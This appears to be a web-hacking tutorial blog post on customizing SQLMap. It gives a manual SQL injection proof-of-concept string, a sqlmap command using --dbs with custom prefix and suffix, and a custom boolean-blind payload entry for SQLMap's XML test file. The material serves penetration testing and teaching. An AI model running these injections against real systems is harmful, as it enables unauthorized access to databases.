Week 7 - Advanced SQLMap
Last updated
It’s Week 7 of our Web App Hacking Tips & Tricks Series! Today we’ll be covering one of my favorite topics, Advanced SQL Injection.
Have you ever been testing an application that appears vulnerable to SQL Injection, but you were unable to automate the exploitation with SQLMap? This has happened to me in the past and is a major pain-in-the-butt. I used to add ‘--tamper=space2comment’ and hope for the best! Nowadays I have a much better approach.
To start off, I always recommend manually finding a working Proof-of-Concept (POC) with Burp Suite (if you want a future post on manual SQL Injection tips, let me know in the comments). From here, you can add your own custom payload into SQLMap. The folder containing all the payload files can be found here:
/usr/share/sqlmap/data/xml/payloads/
First, add the payload in the attached photo below to your ‘boolean_blind.xml’ payload file. Since SQLMap can be finicky, I’ve found that simplifying the custom payload to only its inference (the true/false comparison SQLMap injects, with no surrounding operators or comment syntax) is the most reliable method. Then, use the ‘--prefix’ and ‘--suffix’ flags to supply the rest of the Proof-of-Concept query you found earlier, so that SQLMap wraps every inference in exactly the same context as your working POC. For example, if your working POC looks like:
test.php?id=1']+OR+[1=1]);/*
Then to exploit with your custom payload, your SQLMap command would be:
sqlmap -u "<target-url>" --dbs --prefix="']+OR+[" --suffix="]);/*"
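For reference, here is an added example of what such a stripped-down test entry looks like inside boolean_blind.xml; it is not the author's screenshot, and the title, level/risk and clause/where values are assumptions you should adjust to your own injection point. The file's root element is <root>, and each <test> is one technique SQLMap will try.

```xml
<!-- Added example entry for boolean_blind.xml (not from the original post).
     Drop this <test> inside the existing <root> element of the file.
     stype 1 = boolean-based blind; clause 1 = WHERE/HAVING context;
     where 1 = append the payload to the original parameter value.
     The vector is only the inference: --prefix and --suffix supply the
     "']+OR+[" and "]);/*" parts of the POC around it at run time. -->
<test>
    <title>Custom boolean-based blind - bare inference (prefix/suffix supplied)</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>[INFERENCE]</vector>
    <request>
        <!-- Always-true probe: SQLMap swaps in a random number for [RANDNUM] -->
        <payload>[RANDNUM]=[RANDNUM]</payload>
    </request>
    <response>
        <!-- Always-false probe; the page difference between the two is what
             lets SQLMap tell a true response from a false one -->
        <comparison>[RANDNUM]=[RANDNUM1]</comparison>
    </response>
</test>
```

If the stock tests keep getting in the way, ‘--test-filter’ with a distinctive word from the title (for example --test-filter="Custom") restricts SQLMap to this entry.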
If all goes well, you should have successfully automated SQL Injection using your custom payload!
If you find you’re still having trouble or are dealing with connection errors, just proxy through Burp Suite using the ‘--proxy’ flag (for Burp’s default listener, --proxy=http://127.0.0.1:8080), so you can see exactly what SQLMap is sending. I’ve found this alone solves a good deal of connection errors. Try the ‘--force-ssl’ flag too.